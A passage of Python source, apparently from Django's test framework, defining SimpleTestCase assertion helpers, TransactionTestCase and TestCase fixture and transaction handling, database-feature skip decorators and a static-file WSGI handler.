    # Can be overridden in derived classes.
    client_class = Client
    _overridden_settings = None
    _modified_settings = None
    # Tests shouldn't be allowed to query the database since
    # this base class doesn't enforce any isolation.
    allow_database_queries = False
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        if cls._overridden_settings:
            cls._cls_overridden_context = override_settings(**cls._overridden_settings)
            cls._cls_overridden_context.enable()
        if cls._modified_settings:
            cls._cls_modified_context = modify_settings(cls._modified_settings)
            cls._cls_modified_context.enable()
        if not cls.allow_database_queries:
            # Block database access; the original factories are kept on
            # ``wrapped`` so tearDownClass can undo this.
            for alias in connections:
                connection = connections[alias]
                connection.cursor = _CursorFailure(cls.__name__, connection.cursor)
                connection.chunked_cursor = _CursorFailure(cls.__name__, connection.chunked_cursor)
    @classmethod
    def tearDownClass(cls):
        if not cls.allow_database_queries:
            for alias in connections:
                connection = connections[alias]
                connection.cursor = connection.cursor.wrapped
                connection.chunked_cursor = connection.chunked_cursor.wrapped
        if hasattr(cls, '_cls_modified_context'):
            cls._cls_modified_context.disable()
            delattr(cls, '_cls_modified_context')
        if hasattr(cls, '_cls_overridden_context'):
            cls._cls_overridden_context.disable()
            delattr(cls, '_cls_overridden_context')
        super().tearDownClass()
    def __call__(self, result=None):
        """
        Wrapper around default __call__ method to perform common Django test
        set up. This means that user-defined Test Cases aren't required to
        include a call to super().setUp().
        """
        testMethod = getattr(self, self._testMethodName)
        skipped = (
            getattr(self.__class__, "__unittest_skip__", False) or
            getattr(testMethod, "__unittest_skip__", False)
        )
        if not skipped:
            try:
                self._pre_setup()
            except Exception:
                result.addError(self, sys.exc_info())
                return
        super().__call__(result)
        if not skipped:
            try:
                self._post_teardown()
            except Exception:
                result.addError(self, sys.exc_info())
                return
    def _pre_setup(self):
        """Performs any pre-test setup. This includes:
        * Creating a test client.
        * Clearing the mail test outbox.
        """
        self.client = self.client_class()
        mail.outbox = []
    def _post_teardown(self):
        """Perform any post-test things."""
        pass
    def settings(self, **kwargs):
        """
        A context manager that temporarily sets a setting and reverts to the original value when exiting the context.
        """
        return override_settings(**kwargs)
    def modify_settings(self, **kwargs):
        """
        A context manager that temporarily applies changes to a list setting
        and reverts back to the original value when exiting the context.
        """
        return modify_settings(**kwargs)
    def assertRedirects(self, response, expected_url, status_code=302,
                        target_status_code=200, msg_prefix='',
                        fetch_redirect_response=True):
        """Asserts that a response redirected to a specific URL, and that the
        redirect URL can be loaded.
        Note that assertRedirects won't work for external links since it uses
        TestClient to do a request (use fetch_redirect_response=False to check
        such links without fetching them).
        """
        if msg_prefix:
            msg_prefix += ": "
        if hasattr(response, 'redirect_chain'):
            # The request was a followed redirect
            self.assertTrue(
                len(response.redirect_chain) > 0,
                msg_prefix + "Response didn't redirect as expected: Response code was %d (expected %d)"
                % (response.status_code, status_code)
            )
            self.assertEqual(
                response.redirect_chain[0][1], status_code,
                msg_prefix + "Initial response didn't redirect as expected: Response code was %d (expected %d)"
                % (response.redirect_chain[0][1], status_code)
            )
            url, status_code = response.redirect_chain[-1]
            scheme, netloc, path, query, fragment = urlsplit(url)
            self.assertEqual(
                response.status_code, target_status_code,
                msg_prefix + "Response didn't redirect as expected: Final Response code was %d (expected %d)"
                % (response.status_code, target_status_code)
            )
        else:
            # Not a followed redirect
            self.assertEqual(
                response.status_code, status_code,
                msg_prefix + "Response didn't redirect as expected: Response code was %d (expected %d)"
                % (response.status_code, status_code)
            )
            url = response.url
            scheme, netloc, path, query, fragment = urlsplit(url)
            # Prepend the request path to handle relative path redirects.
            if not path.startswith('/'):
                url = urljoin(response.request['PATH_INFO'], url)
                path = urljoin(response.request['PATH_INFO'], path)
            if fetch_redirect_response:
                # netloc might be empty, or in cases where Django tests the
                # HTTP scheme, the convention is for netloc to be 'testserver'.
                # Trust both as "internal" URLs here.
                domain, port = split_domain_port(netloc)
                if domain and not validate_host(domain, settings.ALLOWED_HOSTS):
                    raise ValueError(
                        "The test client is unable to fetch remote URLs (got %s). "
                        "If the host is served by Django, add '%s' to ALLOWED_HOSTS. "
                        "Otherwise, use assertRedirects(..., fetch_redirect_response=False)."
                        % (url, domain)
                    )
                redirect_response = response.client.get(path, QueryDict(query), secure=(scheme == 'https'))
                # Get the redirection page, using the same client that was used
                # to obtain the original response.
                self.assertEqual(
                    redirect_response.status_code, target_status_code,
                    msg_prefix + "Couldn't retrieve redirection page '%s': response code was %d (expected %d)"
                    % (path, redirect_response.status_code, target_status_code)
                )
        self.assertEqual(
            url, expected_url,
            msg_prefix + "Response redirected to '%s', expected '%s'" % (url, expected_url)
        )
    def _assert_contains(self, response, text, status_code, msg_prefix, html):
        # Shared implementation for assertContains/assertNotContains; returns
        # (text_repr, real_count, msg_prefix) for the caller's assertion.
        # If the response supports deferred rendering and hasn't been rendered
        # yet, then ensure that it does get rendered before proceeding further.
        if hasattr(response, 'render') and callable(response.render) and not response.is_rendered:
            response.render()
        if msg_prefix:
            msg_prefix += ": "
        self.assertEqual(
            response.status_code, status_code,
            msg_prefix + "Couldn't retrieve content: Response code was %d"
            " (expected %d)" % (response.status_code, status_code)
        )
        if response.streaming:
            content = b''.join(response.streaming_content)
        else:
            content = response.content
        if not isinstance(text, bytes) or html:
            text = force_text(text, encoding=response.charset)
            content = content.decode(response.charset)
            text_repr = "'%s'" % text
        else:
            text_repr = repr(text)
        if html:
            content = assert_and_parse_html(self, content, None, "Response's content is not valid HTML:")
            text = assert_and_parse_html(self, text, None, "Second argument is not valid HTML:")
        real_count = content.count(text)
        return (text_repr, real_count, msg_prefix)
    def assertContains(self, response, text, count=None, status_code=200, msg_prefix='', html=False):
        """
        Asserts that a response indicates that some content was retrieved
        successfully, (i.e., the HTTP status code was as expected), and that
        ``text`` occurs ``count`` times in the content of the response.
        If ``count`` is None, the count doesn't matter - the assertion is true
        if the text occurs at least once in the response.
        """
        text_repr, real_count, msg_prefix = self._assert_contains(
            response, text, status_code, msg_prefix, html)
        if count is not None:
            self.assertEqual(
                real_count, count,
                msg_prefix + "Found %d instances of %s in response (expected %d)" % (real_count, text_repr, count)
            )
        else:
            self.assertTrue(real_count != 0, msg_prefix + "Couldn't find %s in response" % text_repr)
    def assertNotContains(self, response, text, status_code=200, msg_prefix='', html=False):
        """
        Asserts that a response indicates that some content was retrieved
        successfully, (i.e., the HTTP status code was as expected), and that
        ``text`` doesn't occur in the content of the response.
        """
        text_repr, real_count, msg_prefix = self._assert_contains(
            response, text, status_code, msg_prefix, html)
        self.assertEqual(real_count, 0, msg_prefix + "Response should not contain %s" % text_repr)
    def assertFormError(self, response, form, field, errors, msg_prefix=''):
        """
        Asserts that a form used to render the response has a specific field
        error.
        """
        if msg_prefix:
            msg_prefix += ": "
        # Put context(s) into a list to simplify processing.
        contexts = to_list(response.context)
        if not contexts:
            self.fail(msg_prefix + "Response did not use any contexts to render the response")
        # Put error(s) into a list to simplify processing.
        errors = to_list(errors)
        # Search all contexts for the error.
        found_form = False
        for i, context in enumerate(contexts):
            if form not in context:
                continue
            found_form = True
            for err in errors:
                if field:
                    if field in context[form].errors:
                        field_errors = context[form].errors[field]
                        self.assertTrue(
                            err in field_errors,
                            msg_prefix + "The field '%s' on form '%s' in"
                            " context %d does not contain the error '%s'"
                            " (actual errors: %s)" %
                            (field, form, i, err, repr(field_errors))
                        )
                    elif field in context[form].fields:
                        self.fail(
                            msg_prefix + "The field '%s' on form '%s' in context %d contains no errors" %
                            (field, form, i)
                        )
                    else:
                        self.fail(
                            msg_prefix + "The form '%s' in context %d does not contain the field '%s'" %
                            (form, i, field)
                        )
                else:
                    # field is falsy: check the form's non-field errors.
                    non_field_errors = context[form].non_field_errors()
                    self.assertTrue(
                        err in non_field_errors,
                        msg_prefix + "The form '%s' in context %d does not"
                        " contain the non-field error '%s'"
                        " (actual errors: %s)" %
                        (form, i, err, non_field_errors)
                    )
        if not found_form:
            self.fail(msg_prefix + "The form '%s' was not used to render the response" % form)
    def assertFormsetError(self, response, formset, form_index, field, errors,
                           msg_prefix=''):
        """
        Asserts that a formset used to render the response has a specific error.
        For field errors, specify the ``form_index`` and the ``field``.
        For non-field errors, specify the ``form_index`` and the ``field`` as
        None.
        For non-form errors, specify ``form_index`` as None and the ``field``
        as None.
        """
        # Add punctuation to msg_prefix
        if msg_prefix:
            msg_prefix += ": "
        # Put context(s) into a list to simplify processing.
        contexts = to_list(response.context)
        if not contexts:
            self.fail(msg_prefix + 'Response did not use any contexts to '
                      'render the response')
        # Put error(s) into a list to simplify processing.
        errors = to_list(errors)
        # Search all contexts for the error.
        found_formset = False
        for i, context in enumerate(contexts):
            if formset not in context:
                continue
            found_formset = True
            for err in errors:
                if field is not None:
                    if field in context[formset].forms[form_index].errors:
                        field_errors = context[formset].forms[form_index].errors[field]
                        self.assertTrue(
                            err in field_errors,
                            msg_prefix + "The field '%s' on formset '%s', "
                            "form %d in context %d does not contain the "
                            "error '%s' (actual errors: %s)" %
                            (field, formset, form_index, i, err, repr(field_errors))
                        )
                    elif field in context[formset].forms[form_index].fields:
                        self.fail(
                            msg_prefix + "The field '%s' on formset '%s', form %d in context %d contains no errors"
                            % (field, formset, form_index, i)
                        )
                    else:
                        self.fail(
                            msg_prefix + "The formset '%s', form %d in context %d does not contain the field '%s'"
                            % (formset, form_index, i, field)
                        )
                elif form_index is not None:
                    non_field_errors = context[formset].forms[form_index].non_field_errors()
                    self.assertFalse(
                        len(non_field_errors) == 0,
                        msg_prefix + "The formset '%s', form %d in context %d "
                        "does not contain any non-field errors." % (formset, form_index, i)
                    )
                    self.assertTrue(
                        err in non_field_errors,
                        msg_prefix + "The formset '%s', form %d in context %d "
                        "does not contain the non-field error '%s' (actual errors: %s)"
                        % (formset, form_index, i, err, repr(non_field_errors))
                    )
                else:
                    non_form_errors = context[formset].non_form_errors()
                    self.assertFalse(
                        len(non_form_errors) == 0,
                        msg_prefix + "The formset '%s' in context %d does not "
                        "contain any non-form errors." % (formset, i)
                    )
                    self.assertTrue(
                        err in non_form_errors,
                        msg_prefix + "The formset '%s' in context %d does not "
                        "contain the non-form error '%s' (actual errors: %s)"
                        % (formset, i, err, repr(non_form_errors))
                    )
        if not found_formset:
            self.fail(msg_prefix + "The formset '%s' was not used to render the response" % formset)
    def _assert_template_used(self, response, template_name, msg_prefix):
        # Shared implementation for assertTemplateUsed/assertTemplateNotUsed.
        # Returns (context_manager_template, template_names, msg_prefix): the
        # first is non-None when the caller should act as a context manager.
        if response is None and template_name is None:
            raise TypeError('response and/or template_name argument must be provided')
        if msg_prefix:
            msg_prefix += ": "
        if template_name is not None and response is not None and not hasattr(response, 'templates'):
            raise ValueError(
                "assertTemplateUsed() and assertTemplateNotUsed() are only "
                "usable on responses fetched using the Django test Client."
            )
        if not hasattr(response, 'templates') or (response is None and template_name):
            if response:
                template_name = response
                response = None
            # use this template with context manager
            return template_name, None, msg_prefix
        template_names = [t.name for t in response.templates if t.name is not None]
        return None, template_names, msg_prefix
    def assertTemplateUsed(self, response=None, template_name=None, msg_prefix='', count=None):
        """
        Asserts that the template with the provided name was used in rendering
        the response. Also usable as context manager.
        """
        context_mgr_template, template_names, msg_prefix = self._assert_template_used(
            response, template_name, msg_prefix)
        if context_mgr_template:
            # Use assertTemplateUsed as context manager.
            return _AssertTemplateUsedContext(self, context_mgr_template)
        if not template_names:
            self.fail(msg_prefix + "No templates used to render the response")
        self.assertTrue(
            template_name in template_names,
            msg_prefix + "Template '%s' was not a template used to render"
            " the response. Actual template(s) used: %s"
            % (template_name, ', '.join(template_names))
        )
        if count is not None:
            self.assertEqual(
                template_names.count(template_name), count,
                msg_prefix + "Template '%s' was expected to be rendered %d "
                "time(s) but was actually rendered %d time(s)."
                % (template_name, count, template_names.count(template_name))
            )
    def assertTemplateNotUsed(self, response=None, template_name=None, msg_prefix=''):
        """
        Asserts that the template with the provided name was NOT used in
        rendering the response. Also usable as context manager.
        """
        context_mgr_template, template_names, msg_prefix = self._assert_template_used(
            response, template_name, msg_prefix
        )
        if context_mgr_template:
            # Use assertTemplateNotUsed as context manager.
            return _AssertTemplateNotUsedContext(self, context_mgr_template)
        self.assertFalse(
            template_name in template_names,
            msg_prefix + "Template '%s' was used unexpectedly in rendering the response" % template_name
        )
    @contextmanager
    def _assert_raises_message_cm(self, expected_exception, expected_message):
        # Context-manager half of assertRaisesMessage: check the message once
        # the managed block has raised.
        with self.assertRaises(expected_exception) as cm:
            yield cm
        self.assertIn(expected_message, str(cm.exception))
    def assertRaisesMessage(self, expected_exception, expected_message, *args, **kwargs):
        """
        Asserts that expected_message is found in the message of a raised
        exception.
        Args:
            expected_exception: Exception class expected to be raised.
            expected_message: expected error message string value.
            args: Function to be called and extra positional args.
            kwargs: Extra kwargs.
        """
        callable_obj = None
        if len(args):
            callable_obj = args[0]
            args = args[1:]
        cm = self._assert_raises_message_cm(expected_exception, expected_message)
        # Assertion used in context manager fashion.
        if callable_obj is None:
            return cm
        # Assertion was passed a callable.
        with cm:
            callable_obj(*args, **kwargs)
    def assertFieldOutput(self, fieldclass, valid, invalid, field_args=None,
                          field_kwargs=None, empty_value=''):
        """
        Asserts that a form field behaves correctly with various inputs.
        Args:
            fieldclass: the class of the field to be tested.
            valid: a dictionary mapping valid inputs to their expected
                    cleaned values.
            invalid: a dictionary mapping invalid inputs to one or more
                    raised error messages.
            field_args: the args passed to instantiate the field
            field_kwargs: the kwargs passed to instantiate the field
            empty_value: the expected clean output for inputs in empty_values
        """
        if field_args is None:
            field_args = []
        if field_kwargs is None:
            field_kwargs = {}
        required = fieldclass(*field_args, **field_kwargs)
        optional = fieldclass(*field_args, **dict(field_kwargs, required=False))
        # test valid inputs
        for input, output in valid.items():
            self.assertEqual(required.clean(input), output)
            self.assertEqual(optional.clean(input), output)
        # test invalid inputs
        for input, errors in invalid.items():
            with self.assertRaises(ValidationError) as context_manager:
                required.clean(input)
            self.assertEqual(context_manager.exception.messages, errors)
            with self.assertRaises(ValidationError) as context_manager:
                optional.clean(input)
            self.assertEqual(context_manager.exception.messages, errors)
        # test required inputs
        error_required = [force_text(required.error_messages['required'])]
        for e in required.empty_values:
            with self.assertRaises(ValidationError) as context_manager:
                required.clean(e)
            self.assertEqual(context_manager.exception.messages, error_required)
            self.assertEqual(optional.clean(e), empty_value)
        # test that max_length and min_length are always accepted
        if issubclass(fieldclass, CharField):
            field_kwargs.update({'min_length': 2, 'max_length': 20})
            self.assertIsInstance(fieldclass(*field_args, **field_kwargs), fieldclass)
    def assertHTMLEqual(self, html1, html2, msg=None):
        """
        Asserts that two HTML snippets are semantically the same.
        Whitespace in most cases is ignored, and attribute ordering is not
        significant. The passed-in arguments must be valid HTML.
        """
        dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:')
        dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:')
        if dom1 != dom2:
            standardMsg = '%s != %s' % (
                safe_repr(dom1, True), safe_repr(dom2, True))
            diff = ('\n' + '\n'.join(difflib.ndiff(
                str(dom1).splitlines(), str(dom2).splitlines(),
            )))
            standardMsg = self._truncateMessage(standardMsg, diff)
            self.fail(self._formatMessage(msg, standardMsg))
    def assertHTMLNotEqual(self, html1, html2, msg=None):
        """Asserts that two HTML snippets are not semantically equivalent."""
        dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:')
        dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:')
        if dom1 == dom2:
            standardMsg = '%s == %s' % (
                safe_repr(dom1, True), safe_repr(dom2, True))
            self.fail(self._formatMessage(msg, standardMsg))
    def assertInHTML(self, needle, haystack, count=None, msg_prefix=''):
        """Assert that the HTML fragment ``needle`` occurs in ``haystack``
        (exactly ``count`` times when ``count`` is given)."""
        needle = assert_and_parse_html(self, needle, None, 'First argument is not valid HTML:')
        haystack = assert_and_parse_html(self, haystack, None, 'Second argument is not valid HTML:')
        real_count = haystack.count(needle)
        if count is not None:
            self.assertEqual(
                real_count, count,
                msg_prefix + "Found %d instances of '%s' in response (expected %d)" % (real_count, needle, count)
            )
        else:
            self.assertTrue(real_count != 0, msg_prefix + "Couldn't find '%s' in response" % needle)
    def assertJSONEqual(self, raw, expected_data, msg=None):
        """
        Asserts that the JSON fragments raw and expected_data are equal.
        Usual JSON non-significant whitespace rules apply as the heavyweight
        is delegated to the json library.
        """
        try:
            data = json.loads(raw)
        except ValueError:
            self.fail("First argument is not valid JSON: %r" % raw)
        if isinstance(expected_data, str):
            try:
                expected_data = json.loads(expected_data)
            except ValueError:
                self.fail("Second argument is not valid JSON: %r" % expected_data)
        self.assertEqual(data, expected_data, msg=msg)
    def assertJSONNotEqual(self, raw, expected_data, msg=None):
        """
        Asserts that the JSON fragments raw and expected_data are not equal.
        Usual JSON non-significant whitespace rules apply as the heavyweight
        is delegated to the json library.
        """
        try:
            data = json.loads(raw)
        except ValueError:
            self.fail("First argument is not valid JSON: %r" % raw)
        if isinstance(expected_data, str):
            try:
                expected_data = json.loads(expected_data)
            except ValueError:
                self.fail("Second argument is not valid JSON: %r" % expected_data)
        self.assertNotEqual(data, expected_data, msg=msg)
    def assertXMLEqual(self, xml1, xml2, msg=None):
        """
        Asserts that two XML snippets are semantically the same.
        Whitespace in most cases is ignored, and attribute ordering is not
        significant. The passed-in arguments must be valid XML.
        """
        try:
            result = compare_xml(xml1, xml2)
        except Exception as e:
            standardMsg = 'First or second argument is not valid XML\n%s' % e
            self.fail(self._formatMessage(msg, standardMsg))
        else:
            if not result:
                standardMsg = '%s != %s' % (safe_repr(xml1, True), safe_repr(xml2, True))
                diff = ('\n' + '\n'.join(
                    difflib.ndiff(xml1.splitlines(), xml2.splitlines())
                ))
                standardMsg = self._truncateMessage(standardMsg, diff)
                self.fail(self._formatMessage(msg, standardMsg))
    def assertXMLNotEqual(self, xml1, xml2, msg=None):
        """
        Asserts that two XML snippets are not semantically equivalent.
        Whitespace in most cases is ignored, and attribute ordering is not
        significant. The passed-in arguments must be valid XML.
        """
        try:
            result = compare_xml(xml1, xml2)
        except Exception as e:
            standardMsg = 'First or second argument is not valid XML\n%s' % e
            self.fail(self._formatMessage(msg, standardMsg))
        else:
            if result:
                standardMsg = '%s == %s' % (safe_repr(xml1, True), safe_repr(xml2, True))
                self.fail(self._formatMessage(msg, standardMsg))
class TransactionTestCase(SimpleTestCase):
    """
    A test case in which real database transactions may be used: isolation
    between tests is achieved by flushing the database in _post_teardown()
    rather than by rolling back a wrapping transaction (contrast TestCase).
    """
    # Subclasses can ask for resetting of auto increment sequence before each
    # test case
    reset_sequences = False
    # Subclasses can enable only a subset of apps for faster tests
    available_apps = None
    # Subclasses can define fixtures which will be automatically installed.
    fixtures = None
    # If transactions aren't available, Django will serialize the database
    # contents into a fixture during setup and flush and reload them
    # during teardown (as flush does not restore data from migrations).
    # This can be slow; this flag allows enabling on a per-case basis.
    serialized_rollback = False
    # Since tests will be wrapped in a transaction, or serialized if they
    # are not available, we allow queries to be run.
    allow_database_queries = True
    def _pre_setup(self):
        """Performs any pre-test setup. This includes:
        * If the class has an 'available_apps' attribute, restricting the app
          registry to these applications, then firing post_migrate -- it must
          run with the correct set of applications for the test case.
        * If the class has a 'fixtures' attribute, installing these fixtures.
        """
        super()._pre_setup()
        if self.available_apps is not None:
            apps.set_available_apps(self.available_apps)
            # Broadcast the temporary INSTALLED_APPS restriction so that
            # setting_changed listeners can invalidate their caches.
            setting_changed.send(
                sender=settings._wrapped.__class__,
                setting='INSTALLED_APPS',
                value=self.available_apps,
                enter=True,
            )
            for db_name in self._databases_names(include_mirrors=False):
                emit_post_migrate_signal(verbosity=0, interactive=False, db=db_name)
        try:
            self._fixture_setup()
        except Exception:
            # Undo the app-registry restriction before re-raising, because
            # _post_teardown() won't run when setup itself fails.
            if self.available_apps is not None:
                apps.unset_available_apps()
                setting_changed.send(
                    sender=settings._wrapped.__class__,
                    setting='INSTALLED_APPS',
                    value=settings.INSTALLED_APPS,
                    enter=False,
                )
            raise
    @classmethod
    def _databases_names(cls, include_mirrors=True):
        # If the test case has a multi_db=True flag, act on all databases,
        # including mirrors or not. Otherwise, just on the default DB.
        if getattr(cls, 'multi_db', False):
            return [
                alias for alias in connections
                if include_mirrors or not connections[alias].settings_dict['TEST']['MIRROR']
            ]
        else:
            return [DEFAULT_DB_ALIAS]
    def _reset_sequences(self, db_name):
        # Reset auto-increment counters (where the backend supports it) so
        # each test starts with predictable primary key values.
        conn = connections[db_name]
        if conn.features.supports_sequence_reset:
            sql_list = conn.ops.sequence_reset_by_name_sql(
                no_style(), conn.introspection.sequence_list())
            if sql_list:
                with transaction.atomic(using=db_name):
                    cursor = conn.cursor()
                    for sql in sql_list:
                        cursor.execute(sql)
    def _fixture_setup(self):
        for db_name in self._databases_names(include_mirrors=False):
            # Reset sequences
            if self.reset_sequences:
                self._reset_sequences(db_name)
            # If we need to provide replica initial data from migrated apps,
            # then do so.
            if self.serialized_rollback and hasattr(connections[db_name], "_test_serialized_contents"):
                if self.available_apps is not None:
                    apps.unset_available_apps()
                connections[db_name].creation.deserialize_db_from_string(
                    connections[db_name]._test_serialized_contents
                )
                if self.available_apps is not None:
                    apps.set_available_apps(self.available_apps)
            if self.fixtures:
                # We have to use this slightly awkward syntax due to the fact
                # that we're using *args and **kwargs together.
                call_command('loaddata', *self.fixtures,
                             **{'verbosity': 0, 'database': db_name})
    def _should_reload_connections(self):
        # Hook for subclasses (see TestCase) to skip reopening connections
        # when rollback-based isolation keeps them usable.
        return True
    def _post_teardown(self):
        """Performs any post-test things. This includes:
        * Flushing the contents of the database, to leave a clean slate. If
          the class has an 'available_apps' attribute, post_migrate isn't fired.
        * Force-closing the connection, so the next test gets a clean cursor.
        """
        try:
            self._fixture_teardown()
            super()._post_teardown()
            if self._should_reload_connections():
                # Some DB cursors include SQL statements as part of cursor
                # creation. If you have a test that does a rollback, the effect
                # of these statements is lost, which can affect the operation of
                # tests (e.g., losing a timezone setting causing objects to be
                # created with the wrong time). To make sure this doesn't
                # happen, get a clean connection at the start of every test.
                for conn in connections.all():
                    conn.close()
        finally:
            # Always restore the full app registry, even if flushing failed.
            if self.available_apps is not None:
                apps.unset_available_apps()
                setting_changed.send(sender=settings._wrapped.__class__,
                                     setting='INSTALLED_APPS',
                                     value=settings.INSTALLED_APPS,
                                     enter=False)
    def _fixture_teardown(self):
        # Allow TRUNCATE ... CASCADE and don't emit the post_migrate signal
        # when flushing only a subset of the apps
        for db_name in self._databases_names(include_mirrors=False):
            # Flush the database
            inhibit_post_migrate = (
                self.available_apps is not None or
                (   # Inhibit the post_migrate signal when using serialized
                    # rollback to avoid trying to recreate the serialized data.
                    self.serialized_rollback and
                    hasattr(connections[db_name], '_test_serialized_contents')
                )
            )
            call_command('flush', verbosity=0, interactive=False,
                         database=db_name, reset_sequences=False,
                         allow_cascade=self.available_apps is not None,
                         inhibit_post_migrate=inhibit_post_migrate)
    def assertQuerysetEqual(self, qs, values, transform=repr, ordered=True, msg=None):
        """
        Assert that queryset `qs`, mapped through `transform`, yields exactly
        `values` (compared order-insensitively when ordered=False).
        """
        items = map(transform, qs)
        if not ordered:
            return self.assertEqual(Counter(items), Counter(values), msg=msg)
        values = list(values)
        # For example qs.iterator() could be passed as qs, but it does not
        # have 'ordered' attribute.
        if len(values) > 1 and hasattr(qs, 'ordered') and not qs.ordered:
            raise ValueError("Trying to compare non-ordered queryset "
                             "against more than one ordered values")
        return self.assertEqual(list(items), values, msg=msg)
    def assertNumQueries(self, num, func=None, *args, using=DEFAULT_DB_ALIAS, **kwargs):
        """
        Assert that calling func(*args, **kwargs) executes exactly `num`
        queries on the `using` database. With func=None, return the context
        manager for use in a `with` block instead.
        """
        conn = connections[using]
        context = _AssertNumQueriesContext(self, num, conn)
        if func is None:
            return context
        with context:
            func(*args, **kwargs)
def connections_support_transactions():
    """
    Return True if every configured database connection supports
    transactions.
    """
    for conn in connections.all():
        if not conn.features.supports_transactions:
            return False
    return True
class TestCase(TransactionTestCase):
    """
    Similar to TransactionTestCase, but uses `transaction.atomic()` to achieve
    test isolation.
    In most situations, TestCase should be preferred to TransactionTestCase as
    it allows faster execution. However, there are some situations where using
    TransactionTestCase might be necessary (e.g. testing some transactional
    behavior).
    On database backends with no transaction support, TestCase behaves as
    TransactionTestCase.
    """
    @classmethod
    def _enter_atomics(cls):
        """Helper method to open atomic blocks for multiple databases"""
        atomics = {}
        for db_name in cls._databases_names():
            atomics[db_name] = transaction.atomic(using=db_name)
            atomics[db_name].__enter__()
        return atomics
    @classmethod
    def _rollback_atomics(cls, atomics):
        """Rollback atomic blocks opened through the previous method"""
        # Unwind in reverse order of entry so nested atomics close correctly.
        for db_name in reversed(cls._databases_names()):
            transaction.set_rollback(True, using=db_name)
            atomics[db_name].__exit__(None, None, None)
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        if not connections_support_transactions():
            # No transactions available: fall back entirely to the
            # TransactionTestCase (flush-per-test) behavior.
            return
        # Class-wide outer atomics; per-test atomics nest inside these.
        cls.cls_atomics = cls._enter_atomics()
        if cls.fixtures:
            for db_name in cls._databases_names(include_mirrors=False):
                try:
                    call_command('loaddata', *cls.fixtures, **{
                        'verbosity': 0,
                        'commit': False,
                        'database': db_name,
                    })
                except Exception:
                    # tearDownClass() won't run when setUpClass raises, so
                    # roll back the class-level atomics here.
                    cls._rollback_atomics(cls.cls_atomics)
                    raise
        try:
            cls.setUpTestData()
        except Exception:
            cls._rollback_atomics(cls.cls_atomics)
            raise
    @classmethod
    def tearDownClass(cls):
        if connections_support_transactions():
            cls._rollback_atomics(cls.cls_atomics)
            for conn in connections.all():
                conn.close()
        super().tearDownClass()
    @classmethod
    def setUpTestData(cls):
        """Load initial data for the TestCase"""
        pass
    def _should_reload_connections(self):
        # Rollback-based isolation leaves connections usable, so there's no
        # need to reopen them between tests.
        if connections_support_transactions():
            return False
        return super()._should_reload_connections()
    def _fixture_setup(self):
        if not connections_support_transactions():
            # If the backend does not support transactions, we should reload
            # class data before each test
            self.setUpTestData()
            return super()._fixture_setup()
        assert not self.reset_sequences, 'reset_sequences cannot be used on TestCase instances'
        # Per-test atomics; rolled back in _fixture_teardown().
        self.atomics = self._enter_atomics()
    def _fixture_teardown(self):
        if not connections_support_transactions():
            return super()._fixture_teardown()
        try:
            for db_name in reversed(self._databases_names()):
                if self._should_check_constraints(connections[db_name]):
                    connections[db_name].check_constraints()
        finally:
            self._rollback_atomics(self.atomics)
    def _should_check_constraints(self, connection):
        # Only check deferred constraints on a usable connection that is not
        # already marked for rollback, and only when the backend can defer
        # constraint checks in the first place.
        return (
            connection.features.can_defer_constraint_checks and
            not connection.needs_rollback and connection.is_usable()
        )
class CheckCondition:
    """
    Descriptor standing in for ``__unittest_skip__`` that evaluates its skip
    conditions lazily, at attribute-access time rather than at import time.
    """
    def __init__(self, *conditions):
        # Each condition is a (callable, reason) pair.
        self.conditions = conditions
    def add_condition(self, condition, reason):
        """Return a new descriptor extended with one more (condition, reason)."""
        extended = self.conditions + ((condition, reason),)
        return self.__class__(*extended)
    def __get__(self, instance, cls=None):
        # Reading the attribute on each base triggers that base's own
        # descriptor, so an inherited skip decision propagates down.
        for base in cls.__bases__:
            if getattr(base, '__unittest_skip__', False):
                return True
        for condition, reason in self.conditions:
            if not condition():
                continue
            # Cache the outcome on the class and record the skip reason.
            cls.__unittest_skip__ = True
            cls.__unittest_skip_why__ = reason
            return True
        return False
def _deferredSkip(condition, reason):
    """
    Like unittest's skip decorators, but with a zero-argument `condition`
    callable evaluated at test run time instead of at import time.
    """
    def decorator(test_func):
        is_test_class = isinstance(test_func, type) and issubclass(test_func, unittest.TestCase)
        if is_test_class:
            # Assume a class is decorated
            test_item = test_func
        else:
            @wraps(test_func)
            def skip_wrapper(*args, **kwargs):
                if condition():
                    raise unittest.SkipTest(reason)
                return test_func(*args, **kwargs)
            test_item = skip_wrapper
        # Retrieve the possibly existing value from the class's dict to
        # avoid triggering the descriptor.
        skip = test_func.__dict__.get('__unittest_skip__')
        if isinstance(skip, CheckCondition):
            test_item.__unittest_skip__ = skip.add_condition(condition, reason)
        elif skip is not True:
            test_item.__unittest_skip__ = CheckCondition((condition, reason))
        return test_item
    return decorator
def skipIfDBFeature(*features):
    """
    Skip a test if a database has at least one of the named features.
    """
    def has_any_feature():
        return any(getattr(connection.features, feature, False) for feature in features)
    return _deferredSkip(
        has_any_feature,
        "Database has feature(s) %s" % ", ".join(features)
    )
def skipUnlessDBFeature(*features):
    """
    Skip a test unless a database has all the named features.
    """
    def lacks_some_feature():
        return not all(getattr(connection.features, feature, False) for feature in features)
    return _deferredSkip(
        lacks_some_feature,
        "Database doesn't support feature(s): %s" % ", ".join(features)
    )
def skipUnlessAnyDBFeature(*features):
    """
    Skip a test unless a database has any of the named features.
    """
    def lacks_all_features():
        return not any(getattr(connection.features, feature, False) for feature in features)
    return _deferredSkip(
        lacks_all_features,
        "Database doesn't support any of the feature(s): %s" % ", ".join(features)
    )
class QuietWSGIRequestHandler(WSGIRequestHandler):
    """
    Just a regular WSGIRequestHandler except it doesn't log to the standard
    output any of the requests received, so as to not clutter the output for
    the tests' results.
    """
    def log_message(*args):
        # Deliberately a no-op. Declared without an explicit `self` so it
        # swallows any argument combination the base class's log_* methods
        # pass through.
        pass
class FSFilesHandler(WSGIHandler):
    """
    WSGI middleware that intercepts calls to a directory, as defined by one of
    the *_ROOT settings, and serves those files, publishing them under *_URL.
    Subclasses must provide get_base_dir() and get_base_url().
    """
    def __init__(self, application):
        # The wrapped WSGI application that handles non-file requests.
        self.application = application
        # urlparse() 6-tuple: [1] is the netloc, [2] the path component.
        self.base_url = urlparse(self.get_base_url())
        super().__init__()
    def _should_handle(self, path):
        """
        Checks if the path should be handled. Ignores the path if:
        * the host is provided as part of the base_url
